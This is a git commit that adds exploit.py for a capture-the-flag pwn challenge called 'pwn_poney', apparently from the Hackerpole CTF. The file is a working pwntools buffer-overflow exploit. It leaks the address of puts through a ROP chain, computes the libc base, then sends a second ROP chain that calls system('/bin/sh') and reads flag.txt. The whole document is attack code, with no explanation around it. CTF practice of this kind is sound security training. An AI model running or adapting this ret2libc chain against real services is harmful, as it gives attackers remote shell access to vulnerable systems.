added all ctfs
This commit is contained in:
34
hackerpole/pwn/pwn_poney/exploit.py
Normal file
34
hackerpole/pwn/pwn_poney/exploit.py
Normal file
@@ -0,0 +1,34 @@
|
||||
from pwn import remote, log, p64, u64, time
|
||||
|
||||
with remote("localhost", 4000, fam="ipv4") as p:
|
||||
p.recvuntil(b">>> ")
|
||||
payload = b"A" * 0x20
|
||||
payload += p64(0x601100) # set rbp
|
||||
payload += p64(0x400743) # pop rdi
|
||||
payload += p64(0x600fc8) # puts got
|
||||
payload += p64(0x400550) # puts plt
|
||||
payload += p64(0x400689) # main addr
|
||||
log.info(payload)
|
||||
p.sendline(payload)
|
||||
leak = p.recvuntil(b"\n", drop=True)
|
||||
p.clean()
|
||||
puts_addr = u64(leak+b"\x00"*2)
|
||||
puts_offset = 0x68f90
|
||||
libc_base = puts_addr - puts_offset
|
||||
system_offset = 0x3f480
|
||||
system_addr = libc_base + system_offset
|
||||
bin_sh_offset = 0x161c19
|
||||
bin_sh_addr = libc_base + bin_sh_offset
|
||||
log.info(f"puts_addr: {hex(puts_addr)}")
|
||||
log.info(f"libc_base: {hex(libc_base)}")
|
||||
log.info(f"system_addr: {hex(system_addr)}")
|
||||
log.info(f"bin_sh_addr: {hex(bin_sh_addr)}")
|
||||
payload2 = b"B" * 0x28
|
||||
payload2 += p64(0x400743)
|
||||
payload2 += p64(bin_sh_addr)
|
||||
payload2 += p64(system_addr)
|
||||
log.info(payload2)
|
||||
p.sendline(payload2)
|
||||
time.sleep(0.1)
|
||||
p.sendline(b"cat flag.txt")
|
||||
log.info(p.clean().decode())
|
||||
Reference in New Issue
Block a user